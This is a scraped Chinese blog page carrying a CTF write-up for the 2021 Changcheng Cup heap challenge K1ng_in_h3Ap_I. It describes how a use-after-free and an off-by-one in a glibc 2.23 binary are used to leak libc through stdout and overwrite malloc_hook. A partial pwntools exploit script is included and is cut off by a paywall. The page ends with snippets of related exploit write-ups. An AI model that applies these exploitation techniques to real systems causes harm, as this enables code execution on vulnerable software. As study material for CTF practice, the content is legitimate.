2021 长城杯 pwn K1ng_in_h3Ap_I

最新推荐文章于 2024-07-19 09:22:52 发布
原创 最新推荐文章于 2024-07-19 09:22:52 发布 · 442 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文通过两个具体的实例展示了如何利用UAF(Use After Free)漏洞进行攻击,包括利用off-by-one漏洞构造攻击以及仅使用UAF漏洞攻击IO_FILE的chunk。文章详细介绍了利用这些漏洞泄露libc基址并控制malloc_hook的过程。

在这里插入图片描述libc是2.23

菜单
在这里插入图片描述

add
在这里插入图片描述

free
在这里插入图片描述显然是有uaf。

edit
在这里插入图片描述就是输入

输入函数其实还有off by one。

有个后门
在这里插入图片描述

我们的思路就是简单的说因为有uaf但是没有show,所以我们就直接攻击stdout,但是又因为后门给了我们地址,所以就解决了爆破这个问题。然后就攻击IO_FILE泄露libc,再攻击malloc_hook就好啦。

第一个exp是利用off by one来构造的。
exp

from pwn import *

r = process("./pwn1")

context.arch='amd64'

elf=ELF("./pwn1")
libc=ELF("./libc.so.6")

def add(index,size):
    r.sendlineafter(">> \n",'1')
    r.sendlineafter("input index:\n",str(index))
    r.sendlineafter("input size:\n",str(size))
def free(index):
    r.sendlineafter(">> \n",'2')
    r.sendlineafter("input index:\n",str(index))
def edit(index,context):
    r.sendlineafter(">> \n",'3')
    r.sendlineafter("input index:\n",str(index))
    r.sendlineafter("input context:\n",context)
def gift():
    r.sendlineafter(">> \n",'666')
    
gift()
stdout = int(r.recv(<
最低0.47元/天 解锁文章
yongbaoii
关注
[uaf + off by one -> stdout leak libc] 长城杯pwn1
huzai9527的博客
09-22 554
1. ida分析 存在uaf 和 off by one,可以实现任意地址写 没有show函数,且保护全开,不能修改got表 2. 思路 使用stdout爆破,泄漏libc 先申请几个chunk,通过off by one,构造chunk lapping 再通过uaf修改fd,构成任意地址写 注意点就是,想法设法构造chunk复用 uaf + off by one 总结一下就是,先del构造fastbin,再改chunk head构造unstored bin,再申请一个不是fastbin大小的chunk覆
长城杯2021 pwn
清霂的博客
09-20 985
长城杯20211.K1ng_in_h3Ap_I2.K1ng_in_h3Ap_II 菜鸡第一次在国内比赛做出两道题,害,长城杯比第五空间温柔多了,第五空间一道rop,之后就直接vm,musl都没学过,还有个c++逆向8出来。打完国赛(写了一道简单堆题,orw调一晚上没出来,服了)之后划水时间太长了,8月下旬才开始继续学堆,争取10月底前把vm,musl,mips,arm这种其他架构(不知道算不算)的pwn学习一下。 1.K1ng_in_h3Ap_I 题目给了3个字节libc地址,操作性还是挺强的,借用残留指针
2021 长城杯 pwn K1ng_in_h3Ap_II
yongbaoii的博客
09-24 316
保护全开 libc是2.27的。 开了沙箱 add 最多16个,大小最大0x60 free 显然是有个uaf edit edit就是正常输入 show 正常输出。 所以其实就是一个2.27的堆srop。 第一步是把因为开沙箱申请然后释放的chunk都从各种链中都拉走。 for i in range(8): allocate(0, 0x10) allocate(0, 0x40) for i in range(7): allocate(0, 0x60) 第二步泄露一下heap的地址。 al
长城杯线上赛WP
蚁景网安学院
09-28 1193
本文为goodcat战队参赛wp,非官方出品Pwn1、 K1ng_in_h3Ap_II libc2.27-0ubuntu1.4,存在明显的UAF;tcahce double free 控...
ycb2020babypwn(unsortedbin爆破stdout泄露)
qq_33590156的博客
12-04 520
题目没有leak函数,肯定得打stdout,但是又是个2.23,有指针没清零的漏洞 在stdout-0x43的地方有0x7f的size,而且和main_arena+88很近,最后三位固定是0x5dd,所以需要爆破第二个字节的高位,概率是1/16。这应该是没leak的通用打法 然后题目是通过double free,控制堆块,修改size进unsortedbin,然后爆破fd,申请出stdout泄露libc,最后打malloc_hook和realloc去getshell。 操作 首先肯定是double free
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
精选资源
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
羊城杯2023 pwn-arrary_index_bank
sagic的博客
07-19 485
存在整数溢出,不可以直接改地址,因为super_ai的返回地址一定比v1高所为不行。会等于0x38呢,因为7*8产生了进位所以4被64位舍弃。程序中含有system函数初步判定可能为ret2text。地址因为是十进制所以进行转换查看是否泄漏成功。地址已经泄漏完成开始payload的搭建。cmp操作进行完比较相同为0不相同为1。接收地址-super_ai的返回地址。考虑堆栈平衡 + 0x1315。发现RAX已经变成负数。泄漏地址为rbp下一位。如何进行整数溢出呢?
2021 长城杯ctf wp
qq_45603443的博客
09-20 5738
2021 长城杯 wpMisc签到你这flag保熟吗Cryptobaby_rsaReverseJust_cmpfunny_jsWebjava_urlez_pythonPwnK1ng_in_h3Ap_IK1ng_in_h3Ap_II Misc 签到 ASCII—16进制—base64 你这flag保熟吗 下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码 从图⽚可以提取出两个rar 得到⼀个excel和⼀个hint hint中提示base64:(,还有⼀串不知所云的base64 excel中是分开来的单
nsctf_online_2019_pwn1(劫持IO_2_1_stdout来泄露地址)
seaaseesa的博客
04-30 1450
nsctf_online_2019_pwn1 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Edit功能里存在一个null off by one漏洞 没有show功能 我们可以利用fastbin attack,修改IO_2_1_stdout的_IO_write_base,这样,当再次调用puts或printf的时候,就会泄露出_IO_write_base~_IO_...
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1444
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
fclose(stdout)后,如何打开stdout
Luke的学习笔记
06-15 2702
#include #include #include #include #include #include #include #include #include #include #include #define N 500 #define L 100 #define Pi acos(-1.0) #define clr(a) memset(a,0,sizeof a)
CoolShell-第4题
热门推荐
05-22 9万+
第4题地址:https://fun.coolshell.cn/furyy.html 没啥想法,输入cat试试,https://fun.coolshell.cn/cat.html。 得到了提示,但是看不懂。 因为对计算机英语不敏感,对pattern这个词没啥想法,在这里卡了很久。 查看网页源代码时,发现网页下方有一堆注释,可能这就是所谓的source。 最后是在网上搜到了解决方法…… 原来题目的意思是这样的,已知几个回文串的模式,其中标红的c、a、t是正确的格式,从s...
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6504
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
第一届“长城杯网络安全大赛 ez_python
weixin_43610673的博客
09-20 1799
利用LFI读文件 /?pic=/home/app/app.py import pickle import base64 from flask import Flask, request from flask import render_template,redirect,send_from_directory import os import requests import random from flask import send_file app = Flask(__name__) class .
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8842
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基准测试使用BBO-PSO-GA附Matlab代码.rar
最新发布
12-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
【无人机路径规划】基于冠豪猪优化算法的三维路径规划模型设计:多目标约束下安全高效飞行路径生成方法 项目介绍 Python实现基于冠豪猪优化算法(CPO)进行无人机三维路径规划(含模型描述及部分示例代码
12-09
内容概要:本文介绍了一个基于冠豪猪优化算法(CPO)的无人机三维路径规划项目,利用Python实现了在复杂三维环境中为无人机规划安全、高效、低能耗飞行路径的完整解决方案。项目涵盖空间环境建模、无人机动力学约束、路径编码、多目标代价函数设计以及CPO算法的核心实现。通过体素网格建模、动态障碍物处理、路径平滑技术和多约束融合机制,系统能够在高维、密集障碍环境下快速搜索出满足飞行可行性、安全性与能效最优的路径,并支持在线重规划以适应动态环境变化。文中还提供了关键模块的代码示例,包括环境建模、路径评估和CPO优化流程。; 适合人群:具备一定Python编程基础和优化算法基础知识,从事无人机、智能机器人、路径规划或智能优化算法研究的相关科研人员与工程技术人员,尤其适合研究生及有一定工作经验的研发工程师。; 使用场景及目标:①应用于复杂三维环境下的无人机自主导航与避障;②研究智能优化算法(如CPO)在路径规划中的实际部署与性能优化;③实现多目标(路径最短、能耗最低、安全性最高)耦合条件下的工程化路径求解;④构建可扩展的智能无人系统决策框架。; 阅读建议:建议结合文中模型架构与代码示例进行实践运行,重点关注目标函数设计、CPO算法改进策略与约束处理机制,宜在仿真环境中测试不同场景以深入理解算法行为与系统鲁棒性。
使用python语言的京东平台抢购脚本
12-09
先看效果: https://pan.quark.cn/s/4f231e33b729 auto-buy-Python-tool 图形界面, 电脑小白也会用, 下载可直接运行! 京东自动购买口罩 实时抢购口罩 工具, 抗击疫情 中国加油! :fire: 点击这里 下载, 解压后可直接运行! 欢迎加星 修复了商品下架后的问题, 更新了交互界面; 修复了可配货商品的判断, 更新了数量调整接口, 更新了是否监控下架商品选项 :star2: 使用指南 :notebookwithdecorative_cover: Tips: 登录一次之后本地会保存登录信息, 重启软件(注意重启之后也行)之后仍然可以记住账号登录信息, 重启之后只需点击"开始监控"就可以登录! 不必重复扫码! 运行界面如下图: interface Update at 2020-3-2: Continuously monitor goods removed from JD.monitorSoldOutGoods Update at 2020-2-15: quantity can be modifiedquantity 填写方式: Tips: 软件启动时带有标准填写格式的默认值, 请留意. 输入商品ID: 比如为: https://item.jd.com/1835967.html 的商品ID为1835967. 输入收件地区编码: 使用Chrome浏览器(如果是其他浏览器请用同样方式打开开发者工具)登录京东并访问商品页, 选择派送地址后按查找开头的讯息, 如下图: AreaID 接受讯息邮箱: 您的接受讯息邮箱. 滑动条: 控制监控时查询的速度(频率). 购买数量: 调整一次购买数量. 是否自动忽略下架商品: 未打...
pwn_deploy_chroot后会有镜像吗
10-02
用户问:“我想了解pwn_deploy_chroot操作后是否会产生镜像”,并提供了参考引用。这些引用是关于Docker和pwn环境搭建的。 关键点: - 用户的问题:pwn_deploy_chroot操作后是否会产生镜像? - 参考引用: - [^1]:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值